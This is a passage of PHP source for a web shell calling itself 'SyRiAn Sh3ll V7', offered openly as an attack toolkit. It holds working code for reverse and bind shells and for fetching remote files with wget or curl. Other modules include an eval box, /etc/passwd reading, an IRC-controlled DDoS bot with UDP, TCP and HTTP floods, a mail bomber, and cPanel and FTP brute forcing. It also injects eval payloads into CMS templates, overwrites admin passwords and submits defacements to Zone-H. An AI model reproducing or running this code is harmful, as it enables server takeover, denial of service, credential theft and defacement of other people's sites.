- </td></tr></table></form>
- <!-- End Of Chmod Force -->
- </td>
- <td>
- <!-- Get File -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Get File </td></tr><tr><td height='45' colspan='2'>
- <input type='text' name='fileUrl' size='59' value='http://www.'>
- <select name=getType>
- <option value=wget>wget</option>
- <option value='curl -o'>curl -o</option>
- <option value=get>get</option>
- <option value='lynx -source'>lynx -source</option>
- </select>
- <input name=getFile type=submit value='Get File' >
- </td></tr></table></form>
- <!-- End Of Get File -->
- </td>
- <td>
- <!-- Bind Connection -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Bind Connection </td></tr><tr><td height='45' colspan='2'>
- <input class='inputz' type='text' name='bind_pass' size='26' value='".gethostbyname($_SERVER["HTTP_HOST"])."'>
- <input type='text' name='port' size='26' value='443'>
- <select class='inputz' size='1' name='use'>
- <option value='Perl'>Perl</option><option value='C'>C</option>
- </select>
- <input class='inputzbut' type='submit' name='bind' value='Bind' style='width:120px'>
- </td></tr></table></form>
- <!-- End Of Bind Connection -->
- </td>
- </tr>
- <tr>
- <td>
- <!-- CGI perl -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>CGI Perl </td></tr><tr><td height='45' colspan='2'>
- <input type='text' value='".getcwd()."' name='cgiperlPath' size='43'>
- <input type='submit' name='generatePel' value='Generate'></td></tr></table></form>
- <!-- End Of CGI perl -->
- </td><td>
- <!-- Forbidden -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Forbidden </td></tr><tr><td height='45' colspan='2'>
- <input type='text' value='".getcwd()."' name='forbiddenPath' size='70%'/>
- <select name='403'>
- <option value='DirectoryIndex'>DirectoryIndex</option>
- <option value='HeaderName'>HeaderName</option>
- <option value='TXT'>TXT</option>
- <option value='404'>404</option>
- <option value='ReadmeName'>ReadmeName</option>
- <option value='footerName'>footerName</option>
- </select>
- <input type='submit' value='Generate' name='generateForbidden'>
- </td></tr></table></form>
- <!-- End Of Forbidden -->
- </td>
- <td>
- <!-- Back Connection -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Back Connection </td></tr><tr><td height='45' colspan='2'>
- <input type='text' name='ip' size='26' value='".GetRealIP()."'>
- <input type='text' name='backport' size='26' value='443'>
- <select name='use'>
- <option value='Perl'>Perl</option>
- <option value='C'>C</option>
- </select>
- <input type='submit' name='backconn' value='Connect'>
- </td></tr></table></form>
- <!-- End Of Back Connection -->
- </td>
- </tr>
- <tr>
- <td>
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Hash Analyzer </td></tr><tr><td height='45' colspan='2'>
- <input type='text' name='hashToAnalyze' size=60>
- <input type='submit' value='Analyze Now' name='analyzieNow'></td></tr></table></form>
- </td>
- <td>
- <!-- Eval Code -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Eval Code </td></tr><tr><td height='45' colspan='2'>
- <input type='text' name='php_eval' size='70' value='echo \"SyRiAn Sh3ll V7\";'>
- <input type=submit name=submitEval value=Eval></td></tr></table></form>
- <!-- End Of Eval Code -->
- </td>
- <td>
- <!-- Users & Domains -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Users & Domains </td></tr><tr><td height='45' colspan='2'>
- <input type='text' name='usersPath' value='".getcwd()."' size='55'/>
- <input type='submit' name='GenerateUsers' Value='Generate'>
- <!-- End Of Users & Domains -->
- </td></tr></table></form>
- </td>
- </tr>
- <tr>
- <td>
- <!-- Reading Files -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Reading Files & Dir Using PHP Bugs </td></tr><tr><td height='45' colspan='2'>
- <input type='text' value='/etc/passwd' name='file' size=35>
- <input class='buttons' type='submit' name='read' value='Read File'>
- <input class='buttons' type='submit' name='show' value='Show directory'>
- </td></tr></table></form>
- <!-- End Of Reading Files -->
- </td>
- <td>
- <!--Encryption -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Encryption </td></tr><tr><td height='45' colspan='2'>
- <input type='text' value='SyRiAn_Sh3ll' name='ENCRYPTION' size='80%'>
- <input type='submit' value='Encrypt' name='encryptNow'>
- </td></tr></table></form>
- <!-- End Of Encryption -->
- </td>
- <td>
- <!-- Metasploit RC -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Metasploit Connection </td></tr><tr><td height='45' colspan='2'>
- <input type='text' size='15' name='ip' value='127.0.0.1'>
- <input type='text' size='5' name='port' value='443'>
- <input type='submit' value='Connect' name='metaConnect'>
- </td></tr></table></form>
- <!-- End Of Metasploit RC -->
- </td>
- </tr>
- <tr>
- <td>
- <!-- DDOS Attacker -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>DDOS Attacker </td></tr><tr><td height='45' colspan='2'>
- <input type='text' name='ipToAttack' size='40' value='Target IP'>
- <input type='text' name='portToAttack' size='20' value='Target PORT'>
- <input type='submit' name='StartAttack' value='Attack'>
- </td></tr></table></form>
- <!-- End Of DDOS Attacker -->
- </td>
- <td>
- <!-- Ports Scanner -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Ports Scanner </td></tr><tr><td height='45' colspan='2'>
- <input type='text' name='domainToScanPort' size='50' value='172.0.0.1'> <input type='submit' name='submitDomainToScanPort' Value='Scan Now'>
- </td></tr></table></form>
- <!-- End Of Ports Scanner -->
- </td>
- <td>
- <!-- ACP Finder -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>ACP Finder </td></tr><tr><td height='45' colspan='2'>
- <input name='hash_lol' class='textbox' type='text' size='30' value='http://www.example.com/'/>
- <input type='text' value='.php' name='extention'/>
- <input name='submit_lol' class='textbox' value='Brute Force Now' type='submit'>
- <!-- End Of ACP Finder -->
- </td></tr></table></form>
- </td>
- </tr>
- <tr>
- <br>
- <td valign='top'>
- <!-- Server ShortCut -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Server ShortCut </td></tr><tr><td height='45' colspan='2'>
- <input type='text' value='".getcwd()."' size='68' name='ShourtCutPath'>
- <input type='submit' name='generateSER' value=' Generate '>
- </td></tr></table></form>
- <!-- End Of Server ShoutCut -->
- </td>
- <td valign='top'>
- <!-- Fast Tools -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Fast Tools </td></tr><tr><td height='45' colspan='2'>
- <input type=submit value='Generate .HTAccess' name='htaccessGenerate'>
- <input type=submit value='Generate php.ini' name='phpiniGenerate'>
- <input type=submit value='Generate ini.php' name='iniphpGenerate'><br/><br/>
- <input type='submit' value='Finding Config Files' name='configFinderSubmit' />
- <input type='submit' name='showUsers' value='Show Users' />
- </td></tr></table></form>
- <!-- End Of Fast Tools -->
- </td>
- <td valign='TOP'>
- <!-- SQL Reader -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>SQL Reader</td></tr><tr><td height='45' colspan='2'>
- <input type='text' value='/etc/passwd' name='file' size='35'><br/>
- <input type='text' name='host' value='127.0.0.1'>
- <input type='text' name='user' value='DB user'>
- <input type='text' name='pass' value='DB pass'>
- <input type=text name='db' value='DB name'>
- <input type='submit' name='sql2Read' value='Read'>
- ";
- if($sql_con)
- {
- echo '<input style="width:300px;" type="text" name="filetoread">
- <input type="submit" value="Read" name="SQLToRead">';
- }
- echo "</td></tr></table></form>
- <!-- End Of SQL Reader -->
- </td>
- </tr>
- <tr>
- <td valign='top'>
- <!-- Mail Storm -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Mail Storm </td></tr><tr><td height='45' colspan='2'>
- <textarea rows='5' cols='45' name='Comments' >Attacker Message</textarea>
- <input type='text' name='to' value='Target Email' >
- <input type='text' size='5' name='nom' value='100'>
- <input name='sendMailStorm' type='submit' value='Send Mail Storm ' >
- </td></tr></table></form>
- <!-- End Of Mail Storm -->
- </td>
- <td valign='top'>
- <!-- SQL Query -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>SQL Query</td></tr><tr><td height='45' colspan='2'>
- <input type = 'text' name=\"QU_HOST\" value='127.0.0.1'>
- <input type = 'text' name=\"QU_USER\" value='DB User'><br/>
- <input type = 'text' name=\"QU_PASS\" value='DB Pass'>
- <input type=text name=\"QU_DB\" value='DB Name' >
- <textarea name='QU' rows=2 cols=50>SELECT * FROM emp ;</textarea>
- <input name='MySQLQuery' type='submit'>
- </td></tr></table></form>
- <!-- SQL Query -->
- </td>
- <td valign='top'>
- <!-- Email Extractor -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Email Extractor</td></tr><tr><td height='45' colspan='2'>
- <input type = 'text' name='EM_HOST' value='127.0.0.1'>
- <input type='text' name='EM_USER' value='DB user'>
- <input type ='text' name='EM_PASS' value='DB pass'>
- <input type='text' name='EM_DB' value='DB name'>
- <input type ='text' name='EM_TABLE' value='users Table'>
- <input type ='text' name='EM_COLUMN' value='emails Column'><br/>
- <input name='getEmails' type='submit' id='submit' style='font-weight: value=Extract now !'>
- <input type='submit' value='?' name='emailExtractorHelp' alt='Email Extractor Help'/>
- </td></tr></table></form>
- <!-- End Of Email Extractor -->
- </td>
- </tr>
- <tr>
- <td valign='top'>
- <!-- Zone-H -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Zone-H Defacer</td></tr><tr><td height='45' colspan='2'>";
- echo '<form action="" method="post">
- <input type="text" name="defacer" size="40" value="Attacker" />
- <select name="hackmode">
- <option >--------SELECT--------</option>
- <option value="1">known vulnerability (i.e. unpatched system)</option>
- <option value="2" >undisclosed (new) vulnerability</option>
- <option value="3" >configuration / admin. mistake</option>
- <option value="4" >brute force attack</option>
- <option value="5" >social engineering</option>
- <option value="6" >Web Server intrusion</option>
- <option value="7" >Web Server external module intrusion</option>
- <option value="8" >Mail Server intrusion</option>
- <option value="9" >FTP Server intrusion</option>
- <option value="10" >SSH Server intrusion</option>
- <option value="11" >Telnet Server intrusion</option>
- <option value="12" >RPC Server intrusion</option>
- <option value="13" >Shares misconfiguration</option>
- <option value="14" >Other Server intrusion</option>
- <option value="15" >SQL Injection</option>
- <option value="16" >URL Poisoning</option>
- <option value="17" >File Inclusion</option>
- <option value="18" >Other Web Application bug</option>
- <option value="19" >Remote administrative panel access bruteforcing</option>
- <option value="20" >Remote administrative panel access password guessing</option>
- <option value="21" >Remote administrative panel access social engineering</option>
- <option value="22" >Attack against administrator(password stealing/sniffing)</option>
- <option value="23" >Access credentials through Man In the Middle attack</option>
- <option value="24" >Remote service password guessing</option>
- <option value="25" >Remote service password bruteforce</option>
- <option value="26" >Rerouting after attacking the Firewall</option>
- <option value="27" >Rerouting after attacking the Router</option>
- <option value="28" >DNS attack through social engineering</option>
- <option value="29" >DNS attack through cache poisoning</option>
- <option value="30" >Not available</option>
- </select>
- <select name="reason">
- <option >--------SELECT--------</option>
- <option value="1" >Heh...just for fun!</option>
- <option value="2" >Revenge against that website</option>
- <option value="3" >Political reasons</option>
- <option value="4" >As a challenge</option>
- <option value="5" >I just want to be the best defacer</option>
- <option value="6" >Patriotism</option>
- <option value="7" >Not available</option>
- </select>
- <textarea name="domain" cols="44" rows="9">List Of Domains</textarea>
- <input type="submit" value="Send Now !" name="SendNowToZoneH" />
- </form>';
- echo "</td></tr></table></form>
- <!-- End Of Zone-H -->
- </td>
- <td valign='top'>
- <!-- Cpanel And FTP BruteForce Attacker -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Cpanel And FTP BruteForce </td></tr><tr><td height='45' colspan='2'>
- <textarea rows='12' name='users' cols='23' >";
- @system('ls /var/mail');
- echo "</textarea>
- <textarea rows='12' name='passwords' cols='23' >123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n!@#$%^\n^%$#@!.\n!@#$%^&\n!@#$%^&*\n!@#$
- %^&*(\npassword\npasswd\npasswords\npass\np@assw0rd\npass@word1
- </textarea>
- <input type='text' name='target' size='16' value='127.0.0.1' >
- <input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (2082)</sy>
- <input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy>
- <input type='submit' value=' Crack it ! ' name='BruteForceCpanelAndFTP' >
- </td></tr></table></form>
- <!-- End Of Cpanel And FTP BruteForce Attacker -->
- </td>
- <td valign='top'>
- <!-- Upload Files -->
- <form enctype=\"multipart/form-data\" method=\"POST\"><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Upload Files </td></tr><tr><td height='45' colspan='2'>
- <input type=\"file\" name=\"uploadfile[]\">
- <input type=\"file\" name=\"uploadfile[]\">
- <input type=\"file\" name=\"uploadfile[]\">
- <input type=\"file\" name=\"uploadfile[]\">
- <input type=\"file\" name=\"uploadfile[]\">
- <input type=\"file\" name=\"uploadfile[]\">
- <input type=\"file\" name=\"uploadfile[]\">
- <input type=\"file\" name=\"uploadfile[]\">
- <input type=\"file\" name=\"uploadfile[]\">
- <input type=\"file\" name=\"uploadfile[]\">
- <input type=\"submit\" value=\"Upload Files\" name='UploadNow'>
- </td></tr></table></form>
- <!-- End Of Upload Files -->
- </td></tr>
- </table>
- ";
- if($_POST['changeDirectory'])
- {
- $directory = $_POST['directory'];
- $directory = @str_replace("\\\\"," ",$directory);
- $directory = @str_replace(" ","\\",$directory);
- @chdir($directory);
- }
- if($_POST['getFile'])
- {
- $fileUrl = $_POST['fileUrl'];
- $getType = $_POST['getType'];
- Exe("'".$getType.$fileUrl."'");
- }
- footer();
- }
- # ---------------------------------------#
- # IndexChanger #
- #----------------------------------------#
- if ($_GET['id']== 'scriptsHack' )
- {
- echo "
- <table width='100%'>
- <tr>
- <td colspan='2'><textarea cols='153' rows='10'>";
- if($_POST['UpdateIndex'] || $_POST['changeInfo'] )
- {
- $host = $_POST['HOST'];
- $user = $_POST['USER'];
- $pass = $_POST['PASS'];
- $db = $_POST['DB'];
- $index = $_POST['INDEX'];
- $prefix = $_POST['PREFIX'];
- if (empty($_POST['HOST']))
- $host = '127.0.0.1';
- $index=str_replace("\'","'",$index);
- @mysql_connect($host,$user,$pass) or die( "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!");
- @mysql_select_db($db) or die ("[-] Database Name Is Wrong !!");
- if($_POST['UpdateIndex'])
- {
- if ($_POST['ScriptType'] == 'vb')
- {
- $full_index = "{\${eval(base64_decode(\'";
- $full_index .= base64_encode("echo \"$index\";");
- $full_index .= "\'))}}{\${exit()}}</textarea>";
- if($_POST['injectFAQ'])
- {
- $injectfaq = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
- }
- else
- {
- $ok1 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='forumhome'");
- if (!$ok1)
- {
- $ok2 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='header'");
- }
- elseif (!$ok2)
- {
- $ok3 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='spacer_open'");
- }
- elseif(!$ok3)
- {
- $ok4 = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'");
- }
- }
- mysql_close();
- if ($ok1 || $ok2 || $ok3 || $ok4 || $injectfaq )
- {
- update();
- }
- else
- {
- echo "Updating Has Failed !";
- }
- }
- else if ($_POST['ScriptType'] == 'wp')
- {
- $tableName = $prefix."posts" ;
- $ok1 = mysql_query("UPDATE $tableName SET post_title ='".$index."' WHERE ID > 0 ");
- if(!$ok1)
- {
- $ok2 = mysql_query("UPDATE $tableName SET post_content ='".$index."' WHERE ID > 0 ");
- }
- elseif(!$ok2)
- {
- $ok3 = mysql_query("UPDATE $tableName SET post_name ='".$index."' WHERE ID > 0 ");
- }
- mysql_close();
- if ($ok1 || $ok2 || $ok3)
- {
- update();
- }
- else
- {
- echo "Updating Has Failed !";
- }
- }
- else if ($_POST['ScriptType'] == 'jos')
- {
- $jos_table_name = $prefix."menu" ;
- $jos_table_name2 = $prefix."modules" ;
- $ok1 = mysql_query("UPDATE $jos_table_name SET name ='".$index."' WHERE ID > 0 ");
- if(!$ok1)
- {
- $ok2 = mysql_query("UPDATE $jos_table_name2 SET title ='".$index."' WHERE ID > 0 ");
- }
- mysql_close();
- if ($ok1 || $ok2 || $ok3)
- {
- update();
- }
- else
- {
- echo "Updating Has Failed !";
- }
- }
- else if ($_POST['ScriptType'] == 'phpbb')
- {
- $php_table_name = $prefix."forums";
- $php_table_name2 = $prefix."posts";
- $ok1 = mysql_query("UPDATE $php_table_name SET forum_name ='.$index.' WHERE forum_id > 0 ");
- if(!$ok1)
- {
- $ok2 = mysql_query("UPDATE $php_table_name2 SET post_subject ='.$index.' WHERE post_id > 0 ");
- }
- mysql_close();
- if ($ok1 || $ok2 || $ok3)
- {
- update();
- }
- else
- {
- echo "Updating Has Failed !";
- }
- }
- else if ($_POST['ScriptType'] == 'ipb')
- {
- $ip_table_name = $prefix."components" ;
- $ip_table_name2 = $prefix."forums" ;
- $ip_table_name3 = $prefix."posts" ;
- $ok1 = mysql_query("UPDATE $ip_table_name SET com_title ='".$index."' WHERE com_id > 0");
- if(!$ok1)
- {
- $ok2 = mysql_query("UPDATE $ip_table_name2 SET name ='".$index."' WHERE id > 0");
- }
- if(!$ok2)
- {
- $ok3 = mysql_query("UPDATE $ip_table_name3 SET post ='".$IP_INDEX."' WHERE pid <10") or die("Can't Update Templates
- !!");
- }
- mysql_close();
- if ($ok1 || $ok2 || $ok3)
- {
- update();
- }
- else
- {
- echo "Updating Has Failed !";
- }
- }
- else if ($_POST['ScriptType'] == 'smf')
- {
- $table_name = $prefix."boards" ;
- {
- $ok1 = mysql_query("UPDATE $table_name SET description ='.$index.' WHERE ID_BOARD > 0");
- }
- if(!$ok1)
- {
- $ok2 = mysql_query("UPDATE $table_name SET name ='.$index.' WHERE ID_BOARD > 0");
- }
- mysql_close();
- if ($ok1 || $ok2)
- {
- update();
- }
- else
- {
- echo "Updating Has Failed !";
- }
- }
- else if ($_POST['ScriptType'] == 'mybb')
- {
- $mybb_prefix = $prefix."templates";
- $ok1 = mysql_query(" update $mybb_prefix set template='".$index."' where title='index' ");
- if ($ok1)
- {
- update();
- }
- else
- {
- echo "Updating Has Failed !";
- }
- mysql_close();
- }
- }
- elseif($_POST['changeInfo'])
- {
- $adminID = $_POST['adminID'];
- $userName = $_POST['userName'];
- $password = $_POST['password'];
- if($_POST['ScriptType'] == 'vb')
- {
- //VB Code
- $password = md5($password);
- $tryChaningInfo = @mysql_query("UPDATE user SET username = '".$userName."' , password = '".$password."' WHERE userid = ".
- $adminID."");
- if($tryChaningInfo)
- {update();}
- else {mysql_error();}
- }
- else if($_POST['ScriptType'] == 'wp')
- {
- //WoredPress
- $password = crypt($password);
- $tryChaningInfo = @mysql_query("UPDATE wp_users SET user_login = '".$userName."' , user_pass = '".$password."' WHERE ID
- = ".$adminID."");
- if($tryChaningInfo)
- {update();}
- else {mysql_error();}
- }
- else if($_POST['ScriptType'] == 'jos')
- {
- //Joomla
- $password = crypt($password);
- $tryChaningInfo = @mysql_query("UPDATE jos_users SET username ='".$userName."' , password = '".$password."' WHERE ID =
- ".$adminID."");
- if($tryChaningInfo)
- {update();}
- else {mysql_error();}
- }
- else if($_POST['ScriptType'] == 'phpbb')
- {
- //PHPBB3
- $password = md5($password);
- $tryChaningInfo = @mysql_query("UPDATE phpbb_users SET username ='".$userName."' , user_password = '".
- $password."' WHERE user_id = ".$adminID."");
- if($tryChaningInfo)
- {update();}
- else {mysql_error();}
- }
- else if($_POST['ScriptType'] == 'ibf')
- {
- //IPBoard
- $password = md5($password);
- $tryChaningInfo = @mysql_query("UPDATE ibf_members SET name ='".$userName."' , member_login_key = '".
- $password."' WHERE id = ".$adminID."");
- if($tryChaningInfo)
- {update();}
- else {mysql_error();}
- }
- else if($_POST['ScriptType'] == 'smf')
- {
- //SMF
- $password = md5($password);
- $tryChaningInfo = @mysql_query("UPDATE smf_members SET memberName ='".$userName."' , passwd =
- '".$password."' WHERE ID_MEMBER = ".$adminID."");
- if($tryChaningInfo)
- {update();}
- else {mysql_error();}
- }
- else if($_POST['ScriptType'] == 'mybb')
- {
- //MyBB
- $password = md5($password);
- $tryChaningInfo = @mysql_query("UPDATE mybb_users SET username ='".$userName."' ,
- password = '".$password."' WHERE uid = ".$adminID."");
- if($tryChaningInfo)
- {update();}
- else {mysql_error();}
- }
- }
- /////////////////////////
- }
- else if($_POST['Decrypt'])
- {
- DecryptConfig();
- }
- echo "</textarea></td></tr>
- <td width='50%'>
- <form method='POST'>
- <table width='100%' height='72' border='0' id='Box'>
- <tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;' >Scripts Hacking </td>
- </tr>
- <tr>
- <td height='45' colspan='2'>
- <input type = 'text' name='HOST' value='localhost'>
- <input type = 'text' name='USER' value='DB Username'>
- <input type = 'text' name='PASS' value='DB Password'>
- <input type=text name='DB' value='DB Name'>
- <input type=text name='PREFIX' value='Prefix'>
- <select name='ScriptType' >
- <option value='vb'>VBulletin</option>
- <option value='wp'>WordPress</option>
- <option value='jos'>Joomla</option>
- <option value='ipb'>IP.Board</option>
- <option value='phpbb'>PHPBB</option>
- <option value='mybb'>MyBB</option>
- <option value='smf'>SMF</option>
- </select>
- <br />
- <sy>Inject Shell In FAQ.php ? <input type='checkbox' name='injectFAQ'> [ VB Only ]</sy><br />
- <textarea name='INDEX' rows=14 cols=64 >Put Your Index Here !</textarea>
- <input type='submit' value='Hack Now !!' name='UpdateIndex' >
- </td>
- </tr>
- </table>
- <td width='50%' valign='top'>
- <table width='100%' height='72' border='0' id='Box'>
- <tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Decrypting Configs </td>
- </tr>
- <tr>
- <td height='45' colspan='2'>
- <sy>Please Put Config In The Shell Directory With The Name [ DecryptConfig.php ]</sy>
- <input value=Decrypt name='Decrypt' type='submit' id='Decrypt' value='Decrypt Now !!'>
- </td>
- </tr>
- </table>
- <table width='100%' height='72' border='0' id='Box'>
- <tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Changing Admin Info </td></tr><tr><td height='45' colspan='2'>
- <input name='adminID' type='text' id='adminID' value='admin id ~= 1'>
- <input name='userName' type='text' id='userName' value='username'>
- <input name='password' type='text' id='password' value='password ( Not Encrypted !)'>
- <input type='submit' name='changeInfo' value='Change Now !'>
- </td>
- </tr>
- </table>
- </form>
- </td>
- </tr></table>";
- footer();
- }
- # ---------------------------------------#
- # DDos Attacker ... #
- #----------------------------------------#
- if($_POST['StartAttack'])
- {
- $server=$_POST['ipToAttack'];
- $Port=$_POST['portToAttack'];
- $nick="bot-";$willekeurig;
- $willekeurig=@mt_rand(0,3);
- $nicknummer=@mt_rand(100000,999999);
- $Channel="#WauShare";
- $Channelpass="ddos";
- $msg="Farewell.";
- @set_time_limit(0);
- $loop = 0;
- $verbonden = 0;
- $verbinden = fsockopen($server, $Port);
- while ($read = fgets($verbinden,512))
- {
- $read = str_replace("\n","",$read);
- $read = str_replace("\r","",$read);
- $read2 = explode(" ",$read);
- if ($loop == 0)
- {
- fputs($verbinden,"nick $nick$nicknummer\n\n");
- fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
- }
- if ($read2[0] == "PING")
- {
- fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n");
- }
- if ($read2[1] == 251)
- {
- fputs($verbinden,"join $Channel $Channelpass\n");
- $verbonden++;
- }
- if (eregi("bot-op",$read))
- {
- fputs($verbinden,"mode $Channel +o $read2[4]\n");
- }
- if (eregi("bot-deop",$read))
- {
- fputs($verbinden,"mode $Channel -o $read2[4]\n");
- }
- if (eregi("bot-quit",$read))
- {
- fputs($verbinden,"quit :$msg\n\n");
- break;
- }
- if (eregi("bot-join",$read))
- {
- fputs($verbinden,"join $read2[4]\n");
- }
- if (eregi("bot-part",$read))
- {
- fputs($verbinden,"part $read2[4]\n");
- }
- if (eregi("ddos-udp",$read))
- {
- fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
- $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
- if (!$fp)
- {
- exit;
- }
- else
- {
- $char = "a";
- for($a = 0; $a < 9999999999999; $a++)
- $data = $data.$char;
- if(fputs ($fp, $data) )
- {
- fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
- }
- else
- {
- fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
- }
- }
- }
- if (eregi("ddos-tcp",$read))
- {
- fputs($verbinden,"part $read2[4]\n");
- fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
- $server = $read2[4];
- $Port = $read2[5];
- for($sockets = 0; $sockets < $read2[6]; $sockets++)
- {
- $verbinden = fsockopen($server, $Port);
- }
- }
- if (eregi("ddos-http",$read))
- {
- fputs($verbinden,"part $read2[4]\n");
- fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
- $Webserver = $read2[4];
- $Port = $read2[5];
- $Aanvraag = "GET / HTTP/1.1\r\n";
- $Aanvraag .= "Accept: */*\r\n";
- $Aanvraag .= "Accept-Language: nl\r\n";
- $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
- $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
- $Aanvraag .= "Host: $read2[4]\r\n";
- $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
- for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
- {
- $DoS = fsockopen($Webserver, $Port);
- fwrite($DoS, $Aanvraag);
- fclose($DoS);
- }
- }
- $loop++;
- }
- }
- # ---------------------------------------#
- # InBoX Mailer #
- #----------------------------------------#
- if ($_GET['id']== 'spamming' )
- {
- $secure = "";
- error_reporting(0);
- @$action=$_POST['action'];
- @$from=$_POST['from'];
- @$realname=$_POST['realname'];
- @$replyto=$_POST['replyto'];
- @$subject=$_POST['subject'];
- @$message=$_POST['message'];
- @$emaillist=$_POST['emaillist'];
- @$lod=$_SERVER['HTTP_REFERER'];
- @$file_name=$_FILES['file']['name'];
- @$contenttype=$_POST['contenttype'];
- @$file=$_FILES['file']['tmp_name'];
- @$amount=$_POST['amount'];
- @set_time_limit(intval($_POST['timelimit']));
- if ($action=="send")
- {
- $message = urlencode($message);
- $message = ereg_replace("%5C%22", "%22", $message);
- $message = urldecode($message);
- $message = stripslashes($message);
- $subject = stripslashes($subject);
- }
- echo "<table width='100%' height='72' border='0' id='Box'>
- <tr>
- <td width='14' height='21' style='background-color:".$shellColor."'> </td>
- <td width='98%' style='background-color:#666;padding-left:10px;' >Inbox Mailer</td>
- </tr>
- <tr>
- <td height='45' colspan='2'>
- <table bgcolor=#cccccc width=\"100%\"><tbody><tr><td align=\"right\" width=100><p dir=ltr>
- <b><font color=#990000 size=-2><p align=left><center><form name=\"form1\" method=\"post\" action=\"\" enctype=\"multipart/form-data\"><br/>
- <table width=142 border=0>
- <tr>
- <td width=81>
- <div align=right>
- <sy>Your Email:</sy></div></td>
- <td width=219><sy>
- <input type=text name=\"from\" value=".$from."></sy></td><td width=212>
- <div align=right>
- <sy>Your Name:</sy></div></td><td width=278>
- <sy>
- <input type=text name=\realname\" value=".$realname."></sy></td></tr><tr><td width=81>
- <div align=\"right\">
